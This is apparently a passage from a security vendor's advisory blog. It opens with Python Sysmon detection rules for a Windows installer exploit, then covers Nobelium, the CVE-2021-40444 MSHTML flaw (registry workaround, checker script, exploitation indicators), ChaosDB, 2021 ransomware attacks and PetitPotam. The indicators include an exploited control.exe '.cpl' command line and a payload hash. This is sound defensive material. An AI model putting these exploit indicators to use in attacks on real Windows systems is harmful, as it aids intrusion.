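UUID_MSI_RE = re.compile(
    r"Users.*AppData\\Local\\Temp\\2\\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}"
    r"-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\}\.msi"
)


def sql_like(pattern, value):
    """Case-insensitive SQL LIKE: '%' matches any run of characters, '_' exactly one."""
    regex = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value, re.IGNORECASE | re.DOTALL) is not None


def rule_sysmon_microsoft_plz(e):
    return (e.get("windows_event_id") == SYSMON_FILE_CREATE
            and sql_like("%microsoft plz%", e.get("target", "")))


def rule_sysmon_msiexec_splwow64(e):
    return (e.get("process_name", "").lower() == MSIEXEC
            and sql_like("%AppData%splwow64.exe", e.get("target", ""))
            and e.get("windows_event_id") in (SYSMON_FILE_CREATE, SYSMON_FILE_DELETE))


def rule_application_test_pkg(e):
    return (e.get("windows_log_name") == "Application"
            and sql_like("%test pkg%", e.get("message", "")))


def rule_application_system_msi_uuid(e):
    # MsiInstaller 1042 (end of an installer transaction) written as SYSTEM but
    # pointing at the initiating user's Temp folder.
    return (e.get("windows_log_name") == "Application"
            and e.get("windows_event_id") == 1042
            and e.get("user") == "SYSTEM"
            and e.get("user_id") == "S-1-5-18"
            and UUID_MSI_RE.search(e.get("message", "")) is not None)


RULES = {
    "sysmon_microsoft_plz": rule_sysmon_microsoft_plz,
    "sysmon_msiexec_splwow64": rule_sysmon_msiexec_splwow64,
    "application_test_pkg": rule_application_test_pkg,
    "application_system_msi_uuid": rule_application_system_msi_uuid,
}


def evaluate(events):
    """Return (event id, rule name) for every rule each event triggers."""
    return [(e["id"], name) for e in events for name, rule in RULES.items() if rule(e)]


TEMP = r"C:\Users\alice\AppData\Local\Temp"
MSI = TEMP + r"\2\{8A1B2C3D-4E5F-6A7B-8C9D-0E1F2A3B4C5D}.msi"
SYSMON = "Microsoft-Windows-Sysmon/Operational"
SAMPLE_EVENTS = [  # constructed for this example, not captured from a real host
    {"id": "evt-1", "windows_log_name": SYSMON, "windows_event_id": 11,
     "process_name": r"C:\Users\alice\Desktop\poc.exe", "target": TEMP + r"\microsoft plz"},
    {"id": "evt-2", "windows_log_name": SYSMON, "windows_event_id": 11,
     "process_name": r"C:\Windows\system32\msiexec.exe", "target": TEMP + r"\splwow64.exe"},
    {"id": "evt-3", "windows_log_name": SYSMON, "windows_event_id": 26,
     "process_name": r"C:\Windows\system32\msiexec.exe", "target": TEMP + r"\splwow64.exe"},
    {"id": "evt-4", "windows_log_name": "Application", "windows_event_id": 1042,
     "user": "SYSTEM", "user_id": "S-1-5-18",
     "message": "Ending a Windows Installer transaction: " + MSI + ". Product Name: test pkg."},
    # Benign activity that must stay quiet: a normal msiexec temp file and a user-run install.
    {"id": "evt-5", "windows_log_name": SYSMON, "windows_event_id": 11,
     "process_name": r"C:\Windows\system32\msiexec.exe", "target": r"C:\Windows\Installer\MSI4F2A.tmp"},
    {"id": "evt-6", "windows_log_name": "Application", "windows_event_id": 1042,
     "user": "alice", "user_id": "S-1-5-21-1000-2000-3000-1001",
     "message": "Ending a Windows Installer transaction: " + MSI + ". Product Name: 7-Zip."},
]

if __name__ == "__main__":
    for event_id, rule in evaluate(SAMPLE_EVENTS):
        print(f"{event_id}: {rule}")
```

Events evt-5 and evt-6 show the two filters that keep ordinary installer activity quiet: the path pattern and the SYSTEM user/SID check.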


    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira can detect activity related to this Windows exploit, as well as many other security incidents.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.

    Learn More In Our Livestream

    Dealing with yet another Microsoft vulnerability before a holiday weekend is frustrating, but Blumira’s security experts can help.

    Watch our livestream with Blumira’s Matthew Warner, CTO and Co-Founder, to get your questions answered before you sign off for the holiday.

    Medium
    October 28, 2021

    MSPs Can Detect Nobelium, SolarWinds’ Attackers

    A set of recent attacks have been attributed to Nobelium, the same nation-state actor behind the SolarWinds attack in 2020.

    The attacks began in May, with Microsoft notifying more than 140 resellers and service providers that were targeted by Nobelium (14 estimated to be compromised), and 609 customers that were attacked over 22,000 times.


    The latest attacks on organizations within the global IT supply chain, as reported by Microsoft, are similar to what we’ve seen in the Kaseya ransomware attack in July:

    • Both target resellers or managed service providers (MSPs) that customize, deploy and manage IT or cloud services on behalf of their customers
    • The attacks leverage the direct access resellers/MSPs may have to customer IT systems

    To protect against observed attack tactics of Nobelium, MSPs should strengthen their preventative and defensive security posture by putting a few basic security measures in place, including using multi-factor authentication, applying the principles of least privilege, and implementing a detection and response solution that can help them identify early indicators of an attack in progress.

    The Attack Methods of Choice: Password Spraying, Phishing & Privileged Accounts

    A key difference in these latest attacks is the type of methods used against victim organizations and service providers. Instead of exploiting a flaw in the remote management and monitoring (RMM) software, as was seen in the Kaseya ransomware attack against MSPs, Nobelium has been reported to use password spraying and phishing to steal credentials and access systems.

    In Microsoft’s guidance for MSPs and cloud service providers on handling the recent attacks, it also notes that privileged accounts are being targeted, in particular:

    Microsoft has observed Nobelium targeting privileged accounts of service providers to move laterally in cloud environments, leveraging the trusted technical relationships to gain access to downstream customers and enable further attacks or access targeted systems.

    Microsoft Partner Network team

    After stealing credentials and compromising accounts at the service provider level, Nobelium then leverages privileged access (delegated administrative privileges – DAP) to further downstream attacks through externally-facing VPNs or solutions that enable network access for providers.

    Prevention: Multi-Factor Authentication; Least Privilege

    These types of identity-based attacks aren’t new, but they still tend to work, as many service providers fail to put into place basic security measures that can deter the success of these attacks:

    • Multi-Factor Authentication (MFA) – Implement this on everything that you log into, especially any critical applications that allow access to your customers or customer data. It can go a long way to stop an attacker from leveraging a single password (stolen or brute-forced via password spraying or phishing) to gain access to your entire customer base. Microsoft has required its resellers to enable MFA to access their cloud portals and underlying services.
    • Least Privilege – Further reduce your overall attack surface by keeping track of user privileges and limit them to only what they need access to in order to complete their job duties. Reduce the scope of your risk by allowing fewer users access to customer-related systems and accounts, or limit to an as-needed basis.

    Detect Early to Prevent Customer Compromise

    In addition to taking preventative measures, detecting Nobelium’s noted attack methods in your environment early enough can enable your IT team to quickly respond and contain/block the threat before it results in customer compromise.

    Identifying the following attacker behaviors can help you focus on real threats and reduce false positives:

    Password Spraying. If protected by only a single factor, the odds of an attacker successfully brute-forcing their way into your systems using this method are high. Blumira identifies and notifies you of any password spraying attempts seen against your accounts, including domain controllers, which indicates an attacker is methodically trying to access your environment while avoiding detections or lockout protections.

    Privileged User Account Changes. Attackers may add users to highly privileged groups, or enable privileged user accounts, to gain access to more resources and gain persistence: the set of techniques an attacker uses to maintain a foothold on your systems (despite restarts, changed credentials or other interruptions that could cut off their access). Blumira detects privileged account activity that could be suspicious so you can investigate further.

    Anomalous MFA Login Activity. Monitoring your MFA applications for unusual activity can help you detect potential attacker behavior early. For example, Blumira detects and notifies your IT team of MFA account lockouts, attempted logins from outside of the U.S., unfeasible or geo-impossible logins by the same user across different locations within a short period of time, and much more.

    This is especially key to monitor, as Microsoft has noted that “Nobelium has been observed authenticating to accounts from anomalous locations that might trigger impossible travel analytics or fail to pass deployed conditional access policies.”

    Credential-Stealing Activity. As noted above, Nobelium may attempt to steal credentials to gain access and move around an environment laterally. Blumira detects credential-stealing activity and alerts you to the IP address and device it originates from, such as behavior that matches known hacking tools used to elevate privileges on a targeted host (e.g., Mimikatz pass-the-hash).

    Azure AD & Microsoft 365 Login Activity. Since this attack is also targeting cloud service providers, Microsoft has advised partners to review and audit Azure AD logins and configuration changes, as well as your existing log availability and retention strategy for cloud-based resources like Microsoft 365. Blumira tracks login attacks against Azure, as well as the creation or modification of a Microsoft 365 group, when a user clicks a malicious URL, unusual administrative activity, emails reported as malware or phishing, and more to keep you aware of ongoing cloud security events.

    This is critical to monitor and detect in a timely manner, as Microsoft has said that “Nobelium has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications…”

    Learn More

    See additional resources for logging this type of activity, including:

    Blumira’s cloud SIEM and security operations team can help MSPs protect themselves and their customers against the many attack methods of Nobelium and other threat actors. We provide:

    • Easy-to-deploy and affordable platform, designed to be set up by your existing team in hours and suited to SMB needs
    • A single centralized dashboard with multi-tenancy to make management simple for MSPs with multiple clients
    • Pre-built detections based on attacker behavior to help reduce alert fatigue, with automated blocking and playbooks for every finding to guide you through response
    • A responsive security operations team you can reach out to for expertise and ongoing support to help you continuously improve your security coverage

    Learn more about Blumira’s partners program and reach out to us if you’d like to sign up.

    Critical
    September 8, 2021

    Microsoft MSHTML CVE-2021-40444 Zero-Day Windows Target

    Microsoft Security
    CVE

    What Happened

    Microsoft, Mandiant and EXPMON researchers discovered a set of flaws in MSHTML (Internet Explorer’s browser engine) that remote, unauthenticated attackers can use to execute code on a system.

    Threat actors are exploiting this zero-day vulnerability in the wild by creating weaponized Office documents to hijack vulnerable Windows systems. Threat actors can use a malicious ActiveX control for an Office document that hosts the browser rendering engine. The attacker would need to persuade a user to open the malicious file, according to Microsoft.


    How Bad is This?

    The CVE has a severity rating of 8.8 out of 10 and affects Windows Server 2008 through 2019 and Windows 8.1 through 10. EXPMON confirmed via Twitter that they reproduced the attack using Office 2019/Office 365 on Windows 10:

    We have reproduced the attack on the latest Office 2019 / Office 365 on Windows 10 (typical user environment), for all affected versions please read the Microsoft Security Advisory. The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous).

    — EXPMON (@EXPMON_) September 7, 2021


    The good news: the default setting for Microsoft Office opens documents from the internet using Protected View or Application Guard for Office, which prevents the attacks.

    To determine the severity of this vulnerability, it’s important to consider the context. Word is currently one of the most common tools used for initial access. For example, CVE-2017-11882 accounted for nearly three-quarters of all exploits leveraged in Q4 2020, according to a report from HP Bromium.

    CVE-2021-40444 will give adversaries yet another way to access Word — which is by no means lacking in existing methods to attack — and will likely have a long tail in terms of exploitation. It still requires people to bypass the “internet protection” step, but does not require the same additional step as macros.

    What Should I Do?

    Microsoft recommends disabling the installation of ActiveX controls in Internet Explorer by updating the registry.

    Microsoft provides the following instructions in its advisory documentation:

    To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    "1001"=dword:00000003
    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
    "1001"=dword:00000003
    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
    "1001"=dword:00000003
    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    "1001"=dword:00000003
    "1004"=dword:00000003

    Double-click the .reg file to apply it to your Policy hive.
    Reboot the system to ensure the new configuration is applied.
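As an added check that is not part of Microsoft’s advisory or this post, the following Python parses the .reg text above and confirms that all four zones set both ActiveX download actions (1001 signed, 1004 unsigned) to 3 (Disable); render_reg is a hypothetical helper used only to build a deliberately weak variant for comparison:

```python
"""Verify the CVE-2021-40444 .reg workaround: every IE zone must disable ActiveX downloads."""
import re

ZONES_KEY_PREFIX = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
REQUIRED_ZONES = (0, 1, 2, 3)              # My Computer, Local intranet, Trusted sites, Internet
REQUIRED_VALUES = {"1001": 3, "1004": 3}   # 1001 = signed, 1004 = unsigned ActiveX download; 3 = Disable

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

# The advisory's .reg text as quoted in the post above.
WORKAROUND_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003
"""


def parse_reg(text):
    """Parse the subset of .reg syntax used here into {key path: {value name: int}}."""
    lines = text.strip().splitlines()
    if not lines or lines[0].strip() != "Windows Registry Editor Version 5.00":
        raise ValueError("missing .reg header")
    keys, current = {}, None
    for raw in lines[1:]:
        line = raw.strip()
        if not line:
            continue
        section = SECTION_RE.match(line)
        if section:
            current = section.group(1)
            keys.setdefault(current, {})
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            keys[current][value.group(1)] = int(value.group(2), 16)
            continue
        raise ValueError(f"unsupported line: {line!r}")
    return keys


def check_activex_disabled(text):
    """Return a list of problems; an empty list means all four zones disable both ActiveX downloads."""
    keys = parse_reg(text)
    problems = []
    for zone in REQUIRED_ZONES:
        values = keys.get(f"{ZONES_KEY_PREFIX}\\{zone}")
        if values is None:
            problems.append(f"zone {zone}: key not present")
            continue
        for name, want in REQUIRED_VALUES.items():
            got = values.get(name)
            if got != want:
                problems.append(f"zone {zone}: {name}={got} (want {want})")
    return problems


def render_reg(zone_settings):
    """Hypothetical helper: build .reg text from {zone: {value name: dword}}."""
    out = ["Windows Registry Editor Version 5.00", ""]
    for zone, values in sorted(zone_settings.items()):
        out.append(f"[{ZONES_KEY_PREFIX}\\{zone}]")
        out.extend(f'"{name}"=dword:{value:08x}' for name, value in values.items())
        out.append("")
    return "\n".join(out)


# Constructed weak variant: zone 2 is missing and zone 3 leaves unsigned ActiveX downloads enabled (0).
WEAK_REG = render_reg({0: {"1001": 3, "1004": 3}, 1: {"1001": 3, "1004": 3}, 3: {"1001": 3, "1004": 0}})

if __name__ == "__main__":
    print("workaround:", check_activex_disabled(WORKAROUND_REG) or "OK")
    print("weak:", check_activex_disabled(WEAK_REG))
```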

    This may seem like an easy mitigation, but some organizations have applications that use ActiveX and will be unable to use this workaround. In those cases, admins should reinforce training on Protected View with End Users to ensure that emailed and downloaded documents do not leave Protected View until patches can be applied. The exploits cannot be triggered until a document moves into “Edit” mode away from Protected View. If you previously disabled Protected View, you should enable it immediately if you cannot disable ActiveX.

    How To Detect

    Blumira is actively developing detection opportunities in our lab environment. Early reports indicate that possible EDR detection of execution may include control.exe with command arguments including cpl:../../../…


    Organizations running both Microsoft Defender Antivirus and Microsoft Defender for Endpoint will be able to detect the exploit without taking additional action, according to Microsoft.

    However, it is important to note that organizations running just Microsoft Defender for Endpoint (not AV) are not protected by default. In that case, you must set EDR to block mode.

    Microsoft’s guidance for this requires you to be running their AV and EDR tooling, directs you to definitions 1.349.22.0 which I suspect is a typo (they’re on .222), and says if you run Defender you do not need to take additional action. EDR in block mode isn’t default. pic.twitter.com/vcZsFzjlNB

    — Kevin Beaumont (@GossiTheDog) September 7, 2021


    Update 9/8/2021 @ 5:35 PM ET: According to Kevin Beaumont aka Twitter user GossiTheDog, threat actors can potentially bypass the Microsoft workaround.

    For bonus points I just modified it to not need a new ActiveX control, which beats the MS work around. Took about a minute. 🤦‍♀️https://t.co/oaVfJfzZcb

    — Kevin Beaumont (@GossiTheDog) September 8, 2021


    If this is true, you should rely on detections to mitigate your risk.

    Update 9/9/2021 @ 9:35 AM ET: Well, things are still bad, will continue to be bad, but not all that much worse than the rest of the Office threat landscape ¯\_(ツ)_/¯

    At Blumira, we’re still working on detection opportunities in our lab environment. One of the more promising detection opportunities we’re looking at is with parent/child process relationships between Office products and control.exe, but we haven’t confirmed this yet. Also, .inf loads are pretty well expected at this point, so detection should work with that in mind. There are also .cab files that are dropped and extracted which may be a detection point as well. Here’s one of the .cab files we pulled down yesterday: 94e5f6d9921493645ad47df612edfc67683a075eaa9e25c7e61298491b097b64 Payload/ministry.cab

    Update 9/13/2021 @ 10:04 AM ET:

    • It’s dead simple and we wouldn’t be surprised if MS comes back with a “working as intended” but we’ll see. Nothing done here is particularly magical and if this is really the first time this is being exploited, it was more of an oversight of techniques by attackers than it was a new magical vulnerability.
    • Any document that can support an externally linked OLE Object that can reference ActiveX can potentially be weaponized. That makes it quite easy to weaponize modern Office files due to how easy it is to modify the XML once unzipped. We could see Autodesk CAD or similar tools that leverage OLE being used here as well potentially, though that would be a much more refined/focused campaign than docx. Most/many would have Word; only specific targets would be using CAD.
      • It’s however much harder to do it in a way that AV/EDR tools won’t be able to detect the file once it’s pulled down: Defender (default) seems to detect the final stage, whereas Defender ATP (fancy) detects the initial loader.
      • The initial loader pattern that was being detected in the document references (word/_rels/document.xml.rels -> !x-usc:) does not appear to be required, so there may be some avoidance if signatures aren’t updated. However, the actual behaviors once exploitation starts likely won’t change much until we get to fileless.
    • The detection for EDR/AV is strong already: this requires (right now) a file to be downloaded (.cab file) and extracted, and then the .dll (.inf-named files) within the cab are run against control.exe in the ActiveXObject. This means that the attacker not only has to get past signature detection for the initial docx (or similar Office file), but also for the downloaded external HTML file and the downloaded .cab file.
    • To detect, we recommend enabling Sysmon. Here’s a snippet pulled from a host that was exploited with Sysmon enabled; even a basic LIKE pattern such as “%control.exe%.inf” should get pretty quick detection on the current implementation: <Data Name="ParentCommandLine">"C:\Windows\System32\control.exe" ".cpl:../../msword.inf",</Data>

    Update 9/15/2021 @ 10:50 AM ET: Microsoft released a patch last night as a part of Patch Tuesday. The main focus of this attack, .docx, still does the external template gathering but does not appear to execute the downloaded exploit. We are still doing more testing around this, but the patch at least does appear to resolve the issues around this specific exploit.

    While this appears to mitigate the worry of current ActiveX exploitation, it still leaves the concern of remote templates being loaded and executed. The risk now migrates to attack methods such as URI scheme manipulation of vulnerable applications, leveraging JavaScript to redirect the endpoint to a specific location once the document is opened. There have been no real-world examples of this exploitation method as of yet, however, and ensuring your applications are up to date will always help defend against this vector.

    We’ll update this post as we find out more.

    Detect Indicators of Attacks With Blumira

    Blumira can detect activity that is indicative of NTLM Relay attacks, as well as many other Microsoft security incidents. By easily integrating Blumira’s detection and response platform with your Windows environment, you can identify indicators of an attack in progress and contain threats to minimize their impact.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations. Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.

    For more information on how to secure against Windows vulnerabilities, download our free guide:

    Medium
    August 30, 2021

    Microsoft Azure Flaw ChaosDB Exposes Cosmos Database

    Microsoft Security

    What Happened?

    On August 27, Wiz, a cloud security provider, publicly disclosed a series of flaws in Azure’s database service, Cosmos DB, that enable any user to download, remove or change company databases without any other credentials.

    The flaw was found in Jupyter Notebook, an open-source visualization tool often used for statistical modeling, machine learning, and data cleaning. Although the tool has been available in Cosmos since 2019, Microsoft enabled it by default for Cosmos in February 2021.

    To gain access to the Cosmos database, Wiz researchers first accessed customers’ Cosmos primary keys, which enable full read, write and delete access to customer data. The notebook container allowed for privilege escalation into other customers’ notebooks, according to Wiz.

    Wiz researchers discovered the vulnerability, which they named ChaosDB, on August 9 and informed Microsoft on August 12. Microsoft disabled the buggy Jupyter Notebook feature on August 14. The vulnerability has not been exploited in the wild, and no customer data was affected, according to Microsoft.

    However, Microsoft’s recent track record for effectively communicating about its vulnerabilities has been suspect, according to various security experts. Microsoft caused confusion during July’s PrintNightmare incident when it first misdiagnosed the severity of the bug, only to update the documentation later on with confirmation that the vulnerability was a remote code execution.

    According to Wiz, Microsoft only warned 30% of its customers about the vulnerability. The actual number of customers affected by ChaosDB is higher, Wiz researchers claimed.

    How Bad is This?

    Wiz CTO Ami Luttwak, who was previously CTO of Microsoft’s Cloud Security Group, called ChaosDB “the worst cloud vulnerability you can imagine.” The flaw left customers’ Cosmos DB databases exposed for the last two years.

    If someone other than Wiz had found the same flaw between February 2021 and now and was able to find and enumerate a company’s Cosmos DB, there would have been far more risk.

    However, the flaw was mitigated when Microsoft disabled the buggy Jupyter Notebook feature, according to Wiz.

    What Should I Do?

    Microsoft advises all Cosmos DB customers to regenerate their primary keys, a task that Microsoft cannot complete on their customers’ behalf.

    The company also provided several other steps to secure Cosmos DB:

    • As a standard security best practice, consider using the Azure Cosmos DB firewall and virtual network integration to control the access to your accounts at the network level.
    • If you are using the Azure Cosmos DB Core (SQL) API, consider using the Azure Cosmos DB role-based access control (RBAC) to authenticate your database operations with Azure Active Directory instead of primary/secondary keys. With RBAC, you have the option to completely disable your account’s primary/secondary keys.
    • For a complete overview of the security controls available on Azure Cosmos DB, refer to our security baseline.

    Cloud customers should be aware of the inherent risks involved with allowing a vendor to store customer data. Cloud services aren’t assigned CVEs, so flaws like ChaosDB get silently patched. A customer may or may not get notified about their exposure because it is up to the vendor to decide whether to perform secure auditing or pentesting.

    Security experts, including those at Wiz, believe that there should be an industry initiative to develop a CVE repository for cloud services.

    There is a massive gap in cloud security, by the way. No CVE numbers are issued for flaws, and suppliers aren’t required to disclose flaws. Cloud services aren’t magically secure.

    You’ll notice public disclosure of this comes from an external researcher.

    — Kevin Beaumont (@GossiTheDog) August 27, 2021


    How To Detect

    Organizations running cloud services should have monitoring capabilities in place to avoid exposure to flaws like ChaosDB. As Wiz notes in their latest update, a number of the actions involved in this are not logged without additional effort, such as the last time a key was regenerated. However, there are a number of opportunities for monitoring to ensure your data is audited and properly secured.

    IT and security teams should be able to monitor:

    • Azure Access to IAM and other administrative actions
    • Azure Cosmos DB access via role-based access control, by enabling Diagnostic Logs
    • Malicious access to other systems like Office 365 and Azure AD where these accounts may have roles that can impact your cloud infrastructure

    How Blumira Secures Azure Cloud

    Blumira’s cloud-based security leverages threat intelligence and behavioral analytics to detect attacker attempts to log in to your systems, including geo-impossible logins and fraudulent login attempts that could indicate the theft of usernames and passwords.

    Blumira easily integrates with AWS and Microsoft Azure to detect misconfigurations, suspicious logins and other behaviors to limit its security impact on your environment.

    Low
    August 20, 2021

    Top 10 Ransomware Attacks of 2021

    So far, 2021 has been a busy year for ransomware actors. The number of ransomware attacks in the first half of 2021 has already outperformed all of 2020 (SonicWall).

    Ransomware

    Let’s explore why 2021 has been a year of frequent and high-profile ransomware attacks, and how those attacks have played out.

    Why Is Ransomware Increasing In 2021?

    The recent spike can partially be attributed to ransomware-as-a-service, an underground market in which ransomware developers outsource their operations to affiliates who then execute the attack. Ransomware affiliates don’t need to have as much technical expertise, which significantly lowers the barriers to entry.

    While ransomware actors are experiencing lower barriers to entry, the financial impact for ransomware victims is higher. In 2020, 32% of ransomware victims needed to pay the criminals to decrypt their data, which was a 23% increase compared to the previous year (Sophos). And the average ransomware payment in 2021 is higher — specifically, 82% higher year over year (PurpleSec).

    All of this points to the idea that ransomware is an increasingly profitable industry. Not only that, but it is becoming a professionalized and sophisticated business. DarkSide — the ransomware gang that brought in at least $60 million before it announced it was shuttering its operations — offered a full customer service department complete with real-time chat support. Success breeds success, and this profitability enables ransomware gangs to pour money into efforts like research and development, which will fuel the ransomware industry even further.

    Top 10 Ransomware Attacks of 2021

    In just the first half of 2021, we saw a variety of high-profile ransomware attacks that have impacted supply chains and even incited the Biden administration to take action against cybercriminals.

    Here’s an overview of 10 major ransomware attacks, in the order of when they occurred.

    1. Kia Motors

    In February, car manufacturer Kia Motors America (KMA) was the victim of a ransomware attack that impacted both internal and customer-facing systems, including mobile apps, payment services, phone services, and dealerships’ systems. The attack also affected IT systems that customers needed to take delivery of new vehicles.

    DoppelPaymer was believed to be the ransomware family that targeted Kia, and the threat actors claimed to have also attacked Hyundai Motors America, Kia’s parent company. Hyundai also experienced similar system outages.

    However, both Kia and Hyundai denied being attacked — a common tactic that victims use in an attempt to preserve reputation and customer loyalty.

    2. CD Projekt Red

    In February, CD Projekt Red, a video game company based in Poland, suffered from a ransomware attack that caused severe disruptions in the development of their highly-contested upcoming release, Cyberpunk 2077. The threat actors reportedly stole source codes for several of the company’s video games, including Cyberpunk 2077, Gwent, The Witcher 3, and the unreleased version of The Witcher 3.


    According to CD Projekt Red, the illegally obtained data is now being circulated online. The company also said that it implemented several security measures after the attack, including new firewalls with anti-malware protection, a new remote-access solution and a redesign of core IT infrastructure.

    3. Acer

    In March, Taiwanese computer manufacturer Acer was a victim of a REvil ransomware attack. This attack was particularly noteworthy due to its demand of $50,000,000 — the largest known ransom to date.

    Prior to the attack, the REvil gang targeted a Microsoft Exchange server on Acer’s domain, according to Advanced Intelligence, which points to a possible weaponization of the Microsoft Exchange vulnerability.

    4. DC Police Department

    In April, the Metropolitan Police Department in D.C. experienced a ransomware attack by a Russian ransomware syndicate known as the Babuk group. The police department refused to comply with the group’s $4 million demand in exchange for not leaking the agency’s data.

    The attack resulted in a massive leak of internal information — amounting to 250GB in data — that included police officer disciplinary files and intelligence reports. Experts said that it was the worst ransomware to hit a U.S. police department.

    5. Colonial Pipeline

    Colonial Pipeline was arguably the most high-profile ransomware attack of 2021. Colonial Pipeline is responsible for transporting nearly half of the East Coast’s fuel. The ransomware attack was the largest cyberattack to target oil infrastructure in the United States’ history.

    On May 7, the DarkSide group deployed ransomware on the organization’s computerized equipment that manages the pipeline. Colonial Pipeline’s CEO revealed DarkSide’s attack vector as a single compromised password to an active VPN account that was no longer in use. Since Colonial Pipeline didn’t use multi-factor authentication, the attackers were more easily able to access the company’s IT network and data.

    While the attack didn’t affect operational technology systems, it did compromise the company’s billing system, which forced Colonial Pipeline to temporarily halt operations. President Biden declared a state of emergency in an effort to alleviate potential gas shortages. However, the attack resulted in fuel shortages in multiple airports, causing American Airlines to temporarily change flight schedules. It also resulted in panic buying and fuel shortages, and the average fuel price rose to the highest price since 2014 at over $3 per gallon.

    Within several hours of the attack, Colonial Pipeline paid the requested ransom of $4.4 million with the assistance of the FBI. On June 7, the Department of Justice announced that it had recovered approximately $2.3 million of the ransom payment.

    6. Brenntag

    Brenntag, a chemical distribution company headquartered in Germany, was also hit with a DarkSide ransomware attack around the same time as Colonial Pipeline in May. The attack, which impacted the company’s North America division, resulted in 150 GB of stolen sensitive data, according to DarkSide. According to DarkSide affiliates, they gained access through purchasing stolen credentials. Threat actors often purchase stolen credentials — such as Remote Desktop credentials — via a dark web marketplace, which is why it’s important to deploy multi-factor authentication and detect risky RDP connections.

    DarkSide’s initial demand was 133.65 Bitcoin, or about $7.5 million, which would have been the largest ransom paid to date. Through negotiations, Brenntag was able to lower the ransom to $4.4 million, which it paid.

    7. Ireland’s Health Service Executive (HSE)

    Ireland’s HSE, which provides healthcare and social services, was hit by a variant of Conti ransomware in May. Following the attack, the organization shut down all of its IT systems, which disrupted many health services in Ireland, such as processing blood tests and diagnostics.

    The HSE refused to pay the $20 million Bitcoin ransom demand. The Conti group later handed over the decryption key for free, but the health service still faced months of significant disruption as it restored the 2,000 IT systems affected by the ransomware.

    8. JBS

    Also in May, JBS, the world’s largest meat processing company, was hit with a ransomware attack that forced it to stop operations at all of its beef plants in the U.S. and to slow production for pork and poultry. The attack significantly disrupted the food supply chain and highlighted how vulnerable the manufacturing and agricultural sectors are to disruptions of this kind.

    The FBI identified the threat actors as the REvil ransomware-as-a-service operation. According to JBS, the threat actors targeted servers that supported their North American and Australian IT systems. The company ultimately paid a ransom of $11 million to the Russian-based ransomware gang to prevent further disruption.

    9. Kaseya

    Kaseya, an IT services company for MSP and enterprise clients, was another victim of REvil ransomware, this time during the July 4th holiday weekend. Although only 0.1% of Kaseya’s customers were breached directly, an estimated 800 to 1,500 small to mid-sized businesses were affected through their MSPs. Among them was Coop, a Sweden-based supermarket chain, which had to close about 800 stores temporarily because their cash registers could not be opened.

    The attackers identified a chain of vulnerabilities — ranging from improper authentication validation to SQL injection — in Kaseya’s on-premises VSA software, which organizations typically run in their DMZs. REvil was then able to use MSP’s Remote Monitoring and Management (RMM) tools to push out the attack to all connected agents.

    10. Accenture

    The ransomware gang LockBit hit Accenture, the global tech consultancy, with an attack in August that resulted in a leak of over 2,000 stolen files. The slow leak suggests that Accenture did not pay the $50 million ransom.

    According to CyberScoop, Accenture knew about the attack on July 30, but did not confirm the breach until August 11, after a CNBC reporter tweeted about it. CRN criticized the firm for its lack of transparency about the attack, saying that the incident was a “missed opportunity by an IT heavyweight” to help spread awareness about ransomware.

    How Blumira Helps Prevent Ransomware Attacks

    A threat detection and response solution like Blumira quickly detects and alerts IT and security teams about indicators of compromise, giving remediation guidance to stop a threat actor early in the stages of a ransomware attack. Blumira detects a variety of suspicious behavior, including the creation of new admin accounts, password spraying, and open RDP ports.

    Although the top ransomware attacks of 2021 were high-profile attacks on large organizations, small to medium-sized businesses are a frequent target due to limited resources and knowledge. Blumira makes it easy for smaller IT and security teams to secure their environment through simple deployment and an intuitive interface. Blumira also provides security playbooks and automated workflows to guide IT teams through security practices that help reduce the overall attack surface.

    To learn more about how to defend against ransomware attacks, download our on-demand webinar. Whether you’re an IT admin with directives from leadership to prevent ransomware or you’re a small business owner that wants to get started with security, we’ve got your back.

    Critical
    July 27, 2021

    NTLM Relay Attack PetitPotam Targets AD Certificate Services

    Microsoft Security

    What Happened?

    Lionel Gilles (@topotam77 on Twitter), a French offensive security researcher at Sogeti, an IT services company based in Paris, recently published a proof-of-concept tool called PetitPotam, which abuses MS-EFSRPC (the Encrypting File System Remote Protocol).

